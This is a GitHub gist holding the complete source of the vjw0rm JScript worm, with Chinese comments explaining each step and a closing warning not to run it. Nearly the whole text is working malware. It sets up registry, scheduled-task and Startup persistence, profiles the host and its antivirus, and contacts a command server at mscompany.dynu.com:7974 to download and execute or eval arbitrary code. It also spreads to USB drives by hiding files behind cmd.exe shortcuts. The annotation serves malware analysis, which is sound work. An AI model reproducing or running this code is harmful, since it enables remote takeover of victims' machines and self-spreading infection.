Last active
March 23, 2022 18:21
-
-
Save poynt2005/165abc6cdf8d0d1fb9b6c3c98517f2a4 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var j = ["WScript.Shell", "Scripting.FileSystemObject", "Shell.Application", "Microsoft.XMLHTTP"]; | |
var g = ["HKCU", "HKLM", "HKCU\\vjw0rm", "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", "HKLM\\SOFTWARE\\Classes\\", "REG_SZ", "\\defaulticon\\"]; | |
var y = ["winmgmts:", "win32_logicaldisk", "Win32_OperatingSystem", 'AntiVirusProduct']; | |
var sh = Cr(0); | |
var fs = Cr(1); | |
var spl = "|V|"; | |
var Ch = "\\"; | |
var VN = "21" + "_" + Ob(6); //Ob(6)回傳磁碟區序號,假設 磁碟區序號為1111-1111,則VN = 21_1111-1111 | |
var fu = WScript.ScriptFullName; | |
var wn = WScript.ScriptName; | |
var U; | |
try { | |
//讀取Hkey current user機碼 | |
U = sh.RegRead(g[2]); | |
//假如沒有vjw0rm | |
} catch (err) { | |
//取得此script絕對位置 | |
var sv = fu.split("\\"); | |
//假設在這個腳本在根目錄 | |
if (":\\" + sv[1] == ":\\" + wn) { | |
U = "TRUE"; | |
//註冊表新增HKCU\vjw0rm 名稱為REG_SZ的數值寫入TRUE | |
sh.RegWrite(g[2], U, g[5]); | |
} else { | |
U = "FALSE"; | |
//註冊表新增HKCU\vjw0rm 名稱為REG_SZ的數值寫入FALSE | |
sh.RegWrite(g[2], U, g[5]); | |
} | |
} | |
//假設現在U設為TRUE | |
Ns(); | |
do { | |
//進入無窮迴圈 | |
try { | |
var P = Pt('Vre', ''); | |
//接到server回復,分析資料 | |
P = P.split(spl); | |
if (P[0] === "Cl") { | |
WScript.Quit(1); | |
} | |
//從server接到的二進位資料P[1],寫入名為P[2]檔案,保存在系統暫存資料夾中 | |
//執行這個檔案 | |
//***猜測P[1]可能為主要的加密工具*** | |
if (P[0] === "Sc") { | |
var s2 = Ex("temp") + "\\" + P[2]; | |
var fi = fs.CreateTextFile(s2, true); | |
fi.Write(P[1]); | |
fi.Close(); | |
sh.run(s2); | |
} | |
//直接執行P[1] | |
if (P[0] === "Ex") { | |
eval(P[1]); | |
} | |
/* | |
1. 唯讀開啟本腳本檔案,讀取之,並存進fr變數 | |
2. VN變成["21", "1111-1111"] | |
3. 置換字串"21"為P[1] | |
4. 把fr寫入本檔,並執行本檔 | |
5. 猜測此步驟可以把本腳本變成加密工具 | |
6. 底下的if block差不多也是做同樣的事,就是想辦法執行P[1]的病毒碼 | |
*/ | |
if (P[0] === "Rn") { | |
var ri = fs.OpenTextFile(fu, 1); | |
var fr = ri.ReadAll(); | |
ri.Close(); | |
VN = VN.split("_"); | |
fr = fr.replace(VN[0], P[1]); | |
var wi = fs.OpenTextFile(fu, 2, false); | |
wi.Write(fr); | |
wi.Close(); | |
sh.run("wscript.exe //B \"" + fu + "\""); | |
WScript.Quit(1); | |
} | |
if (P[0] === "Up") { | |
var s2 = Ex("temp") + "\\" + P[2]; | |
var ctf = fs.CreateTextFile(s2, true); | |
var gu = P[1]; | |
gu = gu.replace("|U|", "|V|"); | |
ctf.Write(gu); | |
ctf.Close(); | |
sh.run("wscript.exe //B \"" + s2 + "\"", 6); | |
WScript.Quit(1); | |
} | |
if (P[0] === "Un") { | |
var s2 = P[1]; | |
var vdr = Ex("Temp") + Ch + wn; | |
var regi = "OBAJQA1X0B"; | |
s2 = s2.replace("%f", fu).replace("%n", wn).replace("%sfdr", vdr).replace("%RgNe%", regi); | |
eval(s2); | |
WScript.Quit(1); | |
} | |
if (P[0] === "RF") { | |
var s2 = Ex("temp") + "\\" + P[2]; | |
var fi = fs.CreateTextFile(s2, true); | |
fi.Write(P[1]); | |
fi.Close(); | |
sh.run(s2); | |
} | |
} catch (err) {} | |
WScript.Sleep(7000); | |
Spr(); | |
} while (true); | |
function Ex(S) { | |
//取得系統bang數 | |
return sh.ExpandEnvironmentStrings("%" + S + "%"); | |
} | |
function Pt(C, A) { | |
//C = "Vre" , A="" | |
//呼叫xhr | |
var X = Cr(3); | |
//初始化http請求,等一下對http://mscompany.dynu.com:7974/Vre送出Post Request | |
X.open('POST', 'http://mscompany.dynu.com:7974/' + C, false); | |
//Header的userAgnet欄設為21_1111-1111\desktop-123456moethfucker)\Microsoft Windows 7 Enterprise\ESET NOD32 Antivirus 4\\YES\TRUE | |
X.SetRequestHeader("User-Agent:", nf()); | |
//送出request | |
X.send(A); | |
//回傳response文字 | |
return X.responsetext; | |
} | |
function nf() { | |
var s, | |
NT//(假設NT為YES), | |
i; | |
//假如%Windir%\Microsoft.NET\Framework\v2.0.50727\vbc.exe 存在 | |
//%Windir%通常是C:\Windows | |
if (fs.fileexists(Ex("Windir") + "\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe")) { | |
//NT設定為YES | |
NT = "YES"; | |
} else { | |
//不然為NO | |
NT = "NO"; | |
} | |
s = VN + Ch + Ex("COMPUTERNAME") + Ch + Ex("USERNAME") + Ch + Ob(2) + Ch + Ob(4) + Ch + Ch + NT + Ch + U + Ch; | |
//回傳 21_1111-1111\%COMPUTERNAME%(假設為:desktop-123456)\%USERNAME%(假設為:moethfucker)\Microsoft Windows 7 Enterprise\ESET NOD32 Antivirus 4\\YES\TRUE | |
return s; | |
} | |
function Cr(N) { | |
return new ActiveXObject(j[N]); | |
} | |
function Ob(N) { | |
var s; | |
//回傳作業系統版本名字 | |
if (N == 2) { | |
//Win32_OperatingSystem代表一個安裝在電腦上的windows based作業系統 | |
s = GetObject(y[0]).InstancesOf(y[2]); | |
var en = new Enumerator(s); | |
for (; !en.atEnd(); en.moveNext()) { | |
var it = en.item(); | |
//Caption為一個字串,代表作業系統版本,例如"Microsoft Windows 7 Enterprise" | |
return it.Caption; | |
break; | |
} | |
} | |
//反正就是拿到防毒軟體名字(例如: ESET NOD32 Antivirus 4) | |
//估計這步驟是要讓server回傳可以躲過特定防毒軟體的病毒。。。 | |
if (N == 4) { | |
/* | |
有兩種版本的securitycenter, | |
securitycenter1: Vista之前的Windows | |
securitycenter2: Vista之後的Windows | |
兩者的資料結構不太一樣 | |
*/ | |
var wmg = "winmgmts:\\\\localhost\\root\\securitycenter"; | |
s = GetObject(wmg).InstancesOf(y[3]); | |
var en = new Enumerator(s); | |
for (; !en.atEnd(); en.moveNext()) { | |
var it = en.item(); | |
var str = it.DisplayName; | |
} | |
if (str !== '') { | |
wmg = wmg + "2"; | |
s = GetObject(wmg).InstancesOf(y[3]); | |
en = new Enumerator(s); | |
for (; !en.atEnd(); en.moveNext()) { | |
it = en.item(); | |
return it.DisplayName; | |
} | |
} else { | |
return it.DisplayName; | |
} | |
} | |
//此block回傳磁碟區序號 | |
if (N == 6) { | |
//GetObject("WinMgmts:")获取系统信息 | |
//Win32_LogicalDisk代表一個安裝著windows的硬碟 | |
s = GetObject(y[0]).InstancesOf(y[1]); | |
//Enumerator 可以列舉collections裡的物品 | |
var en = new Enumerator(s); | |
for (; !en.atEnd(); en.moveNext()) { | |
var it = en.item(); | |
//volumeserialnumber為一個字串,長度最長為11個字,代表一個邏輯磁區的序號(Ex: "1111-1111") | |
return it.volumeserialnumber; | |
break; | |
} | |
} | |
} | |
function Ns() { | |
//取得系統暫存檔資料夾(Ex: C:\User\AppData\Local\TEMP) | |
var dr = Ex("TEMP") + Ch + wn; | |
try { | |
//將此script複製到暫存資料夾 | |
fs.CopyFile(fu, dr, true); | |
} catch (err) {} | |
try { | |
//在HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\OBAJQA1X0B 新增REG_SZ,寫入此檔案位置 | |
//開機會啟動此檔 | |
sh.RegWrite(g[0] + g[3] + "OBAJQA1X0B", "\"" + dr + "\"", g[5]); | |
} catch (err) {} | |
try { | |
//建立名為Skype排程器,每30分鐘執行一次 | |
sh.run("Schtasks /create /sc minute /mo 30 /tn Skype /tr \"" + dr, false); | |
} catch (err) {} | |
try { | |
var ap = Cr(2); | |
//把此script複製到使用者存放啟動項目的資料夾 | |
//NameSpace(ssfSTARTUP = 7) => 使用者存放啟動項目的資料夾 | |
fs.CopyFile(fu, ap.NameSpace(7).Self.Path + "\\" + wn, true); | |
} catch (err) {} | |
} | |
function Spr() { | |
try { | |
//GetObject會傳回 ActiveX 元件所提供之物件的參照 | |
var ld = GetObject(y[0]).InstancesOf(y[1]); | |
var edi = new Enumerator(ld); | |
for (; !edi.atEnd(); edi.moveNext()) { | |
var dri = edi.item(); | |
//DeviceID : Unique identifier of the logical disk from other devices on the system. | |
//GetDrive是一個可以指向某個特定的磁碟機的物件 | |
var dri = fs.GetDrive(dri.DeviceID); | |
var dp = dri.Path + "\\"; | |
if (dri.IsReady) { | |
//假設此裝置為卸除式媒體(行動硬碟、軟碟、U盤) | |
if (dri.DriveType === 1) { | |
//將本腳本複製到這個卸除式媒體裡面 | |
fs.CopyFile(fu, dp + wn, true); | |
if (fs.FileExists(dp + wn)) { | |
//代表此檔案為系統檔案,並且隱藏 | |
fs.GetFile(dp + wn).attributes = 2 + 4; | |
} | |
try { | |
//取得這個媒體所有的資料夾 | |
var ef = new Enumerator(fs.GetFolder(dp).SubFolders); | |
for (; !ef.atEnd(); ef.moveNext()) { | |
//取得其中一個資料夾 | |
var gf = ef.item(); | |
gf.attributes = 2 + 4; | |
wn = wn.replace(" ", "\"" + " " + "\""); | |
var n = gf.name; | |
n = n.replace(" ", "\"" + " " + "\""); | |
//為這個資料夾建立捷徑 | |
var sr = sh.CreateShortCut(dp + gf.name + ".lnk"); | |
//未來執行這個捷徑會自動縮小 | |
sr.WindowStyle = 7; | |
//此捷徑指向cmd.exe | |
sr.TargetPath = "cmd.exe"; | |
//打開此捷徑的話會自動啟動本腳本,而且改變這個捷徑的圖標 | |
sr.Arguments = "/c start " + wn + "&start explorer " + n + "&exit"; | |
var rp = "HKLM\\software\\classes\\folder\\defaulticon\\"; | |
var fic = sh.RegRead(rp); | |
var ci = sr.IconLocation; | |
var sci = ","; | |
if (ci.indexOf(sci) !== -1) { | |
sr.IconLocation = fic; | |
} else { | |
sr.IconLocation = gf.Path; | |
} | |
sr.Save(); | |
} | |
} catch (err) {} | |
try { | |
//獲得所有文件 | |
var efi = new Enumerator(fs.GetFolder(dp).Files); | |
for (; !efi.atEnd(); efi.moveNext()) { | |
//取得其中一個文件 | |
var gfi = efi.item(); | |
var dot = "."; | |
var lnk = "lnk"; | |
if (gfi.name.indexOf(dot) !== -1) { | |
if (gfi.name.indexOf(lnk) !== -1) {} | |
else { | |
//假設這個文件不是本腳本檔 | |
if (gfi.name !== wn) { | |
//這個文件設為隱藏、系統檔 | |
gfi.attributes = 2 + 4; | |
var nu = gfi.name; | |
nu = nu.replace(" ", "\"" + " " + "\""); | |
wn = wn.replace(" ", "\"" + " " + "\""); | |
//然後這邊基本上跟上面一樣,把原本檔案設為隱藏,然後新增捷徑,把該捷徑圖標轉成原本的檔案的圖標 | |
var shr = sh.CreateShortCut(dp + gfi.name + ".lnk"); | |
shr.WindowStyle = 7; | |
shr.TargetPath = "cmd.exe"; | |
shr.Arguments = "/c start " + wn + "&start " + nu + "&exit"; | |
var sgf = gfi.name.split("."); | |
var fvi = sh.RegRead(g[4] + "." + sgf[sgf.length - 1] + "\\"); | |
var fvi2 = sh.RegRead(g[4] + fvi + g[6] + "\\"); | |
var ci = shr.IconLocation; | |
var sci = ","; | |
if (ci.indexOf(sci) !== -1) { | |
shr.IconLocation = fvi2; | |
} else { | |
shr.IconLocation = gfi.Path; | |
} | |
shr.Save(); | |
} | |
} | |
} | |
} | |
} catch (err) {} | |
} | |
} | |
} | |
} catch (err) {} | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
這個好像是前陣子流行的 "U盤通通bang捷徑" 的病毒,反正看到U盤通通都是捷徑就不要貿然執行
PS: 可以把WScript host的程式關掉,關掉後就不能執行本腳本了,反正WScript host也沒什麼洨用
PS: 不要執行本腳本
PS: 詳細資料可參考這篇: 趨勢科技資料
基本上小弟推論應該正確= =